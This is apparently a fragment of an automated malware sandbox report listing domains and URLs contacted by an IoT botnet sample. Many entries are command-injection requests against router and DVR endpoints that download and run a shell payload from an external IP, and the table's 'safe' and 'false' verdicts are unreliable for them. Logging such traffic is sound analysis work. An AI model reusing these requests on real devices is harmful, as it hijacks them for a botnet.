lkfd.ru 87.236.16.171 true
aeck.ru 194.58.112.165 true
edbf.ru 5.101.153.249 true
www.dfce.ru 31.31.205.163 true
www.aabl.ru 78.108.89.108 true
laea.ru 159.69.115.63 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://192.168.0.138/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
    		unknown
    http://192.168.0.195/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
      		unknown
      http://192.168.0.67/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
      • Avira URL Cloud: safe
      		 unknown
      http://192.168.0.162/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
        		unknown
        http://5.157.87.204/ false
        • Avira URL Cloud: safe
        		 unknown
        http://192.168.0.105/GponForm/diag_Form?images/ false
        • Avira URL Cloud: safe
        		 unknown
        http://192.168.0.51/GponForm/diag_Form?images/ false
        • Avira URL Cloud: safe
        		 unknown
        http://192.168.0.37/GponForm/diag_Form?images/ false
        • Avira URL Cloud: safe
        		 unknown
        http://185.130.251.70/ false
        • Avira URL Cloud: safe
        		 unknown
        http://192.168.0.138/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
        • Avira URL Cloud: safe
        		 unknown
        http://192.168.0.195/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
        • Avira URL Cloud: safe
        		 unknown
        http://192.168.0.194/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
          		unknown
          http://192.168.0.105/language/Swedish false
          • Avira URL Cloud: safe
          		 unknown
          http://192.168.0.68/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
            		unknown
            http://192.168.0.67/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
              		unknown
              http://192.168.0.209/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                		unknown
                http://192.168.0.194/language/Swedish false
                • Avira URL Cloud: safe
                		 unknown
                http://192.168.0.128/GponForm/diag_Form?images/ false
                • Avira URL Cloud: safe
                		 unknown
                http://192.168.0.68/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                • Avira URL Cloud: safe
                		 unknown
                http://62.122.170.171/ false
                • Avira URL Cloud: safe
                		 unknown
                http://192.168.0.195/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                  		unknown
                  http://90.188.239.74/ false
                  • Avira URL Cloud: safe
                  		 unknown
                  http://95.188.104.7/ false
                  • Avira URL Cloud: safe
                  		 unknown
                  http://192.168.0.194/GponForm/diag_Form?images/ false
                  • Avira URL Cloud: safe
                  		 unknown
                  http://212.109.199.81/ false
                  • Avira URL Cloud: safe
                  		 unknown
                  http://159.69.115.63/ false
                  • Avira URL Cloud: safe
                  		 unknown
                  http://192.168.0.129/language/Swedish false
                  • Avira URL Cloud: safe
                  		 unknown
                  http://192.168.0.128/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                  • Avira URL Cloud: safe
                  		 unknown
                  http://192.168.0.105/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                    		unknown
                    http://31.31.196.247/ false
                    • Avira URL Cloud: safe
                    		 unknown
                    http://192.168.0.195/GponForm/diag_Form?images/ false
                    • Avira URL Cloud: safe
                    		 unknown
                    http://192.168.0.128/language/Swedish false
                    • Avira URL Cloud: safe
                    		 unknown
                    http://212.158.165.76/ false
                    • Avira URL Cloud: safe
                    		 unknown
                    http://192.168.0.51/language/Swedish false
                    • Avira URL Cloud: safe
                    		 unknown
                    http://192.168.0.162/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                      		unknown
                      http://31.31.198.147/ false
                      • Avira URL Cloud: safe
                      		 unknown
                      http://192.168.0.129/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                      • Avira URL Cloud: safe
                      		 unknown
                      http://192.168.0.209/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                        		unknown
                        http://37.230.114.67/ false
                        • Avira URL Cloud: safe
                        		 unknown
                        http://192.168.0.128/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                          		unknown
                          http://46.30.40.105/ false
                          • Avira URL Cloud: safe
                          		 unknown
                          http://192.168.0.68/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                            		unknown
                            http://104.21.57.213/ false
                            • Avira URL Cloud: safe
                            		 unknown
                            http://84.201.165.75/ false
                            • Avira URL Cloud: safe
                            		 unknown
                            http://192.168.0.128/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                              		unknown
                              http://172.67.167.8/ false
                              • Avira URL Cloud: safe
                              		 unknown
                              http://192.168.0.209/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                		unknown
                                http://31.177.76.70/ false
                                • Avira URL Cloud: safe
                                		 unknown
                                http://109.248.201.170/ false
                                • Avira URL Cloud: safe
                                		 unknown
                                http://192.168.0.209/language/Swedish false
                                • Avira URL Cloud: safe
                                		 unknown
                                http://194.58.112.174/ false
                                • Avira URL Cloud: safe
                                		 unknown
                                http://192.168.0.51/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                  		unknown
                                  http://31.31.198.215/ false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.195/language/Swedish false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.129/GponForm/diag_Form?images/ false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.129/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.68/GponForm/diag_Form?images/ false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.37/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.162/GponForm/diag_Form?images/ false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.67/GponForm/diag_Form?images/ false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.162/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://31.177.80.70/ false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.194/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://87.236.16.171/ false
                                  • Avira URL Cloud: safe
                                  		 unknown
                                  http://192.168.0.37/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                    		unknown
                                    http://192.168.0.105/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                    • Avira URL Cloud: safe
                                    		 unknown
                                    http://192.168.0.37/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                      		unknown
                                      http://192.168.0.209/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                      • Avira URL Cloud: safe
                                      		 unknown
                                      http://192.168.0.162/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                        		unknown
                                        http://192.168.0.194/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                          		unknown
                                          http://192.168.0.129/cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                            		unknown
                                            http://192.168.0.128/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                            • Avira URL Cloud: safe
                                            		 unknown
                                            http://192.168.0.51/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                            • Avira URL Cloud: safe
                                            		 unknown
                                            http://192.168.0.105/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                              		unknown
                                              http://104.21.84.89/ false
                                              • Avira URL Cloud: safe
                                              		 unknown
                                              http://192.168.0.194/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                              • Avira URL Cloud: safe
                                              		 unknown
                                              http://192.168.0.105/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                		unknown
                                                http://192.168.0.67/language/Swedish false
                                                • Avira URL Cloud: safe
                                                		 unknown
                                                http://78.108.89.108/ false
                                                • Avira URL Cloud: safe
                                                		 unknown
                                                http://192.168.0.68/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                  		unknown
                                                  http://192.168.0.105/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                  • Avira URL Cloud: safe
                                                  		 unknown
                                                  http://192.168.0.68/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd false
                                                  • Avira URL Cloud: safe
                                                  		 unknown
                                                  http://194.58.108.126/ false
                                                  • Avira URL Cloud: safe
                                                  		 unknown
                                                  http://31.177.76.145/ false
                                                  • Avira URL Cloud: safe
                                                  		 unknown
                                                  http://192.168.0.162/language/Swedish false
                                                  • Avira URL Cloud: safe
                                                  		 unknown
                                                  http://192.168.0.51/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                    		unknown
                                                    http://192.168.0.209/GponForm/diag_Form?images/ false
                                                    • Avira URL Cloud: safe
                                                    		 unknown
                                                    http://192.168.0.37/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd false
                                                    • Avira URL Cloud: safe
                                                    		 unknown
                                                    http://92.53.96.137/ false
                                                    • Avira URL Cloud: safe
                                                    		 unknown
                                                    http://192.168.0.129/board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                      		unknown
                                                      http://192.168.0.128/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                        		unknown
                                                        http://192.168.0.138/language/Swedish false
                                                        • Avira URL Cloud: safe
                                                        		 unknown
                                                        http://192.168.0.129/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                          		unknown
                                                          http://178.159.33.243/ false
                                                          • Avira URL Cloud: safe
                                                          		 unknown
                                                          http://185.133.42.146/ false
                                                          • Avira URL Cloud: safe
                                                          		 unknown
                                                          http://5.101.153.249/ false
                                                          • Avira URL Cloud: safe
                                                          		 unknown
                                                          http://91.226.31.83/ false
                                                          • Avira URL Cloud: safe
                                                          		 unknown
                                                          http://192.168.0.138/shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; false
                                                            		unknown
                                                            http://194.58.112.165/ false
                                                            • Avira URL Cloud: safe
                                                            		 unknown
                                                            http://192.168.0.138/GponForm/diag_Form?images/ false
                                                            • Avira URL Cloud: safe
                                                            		 unknown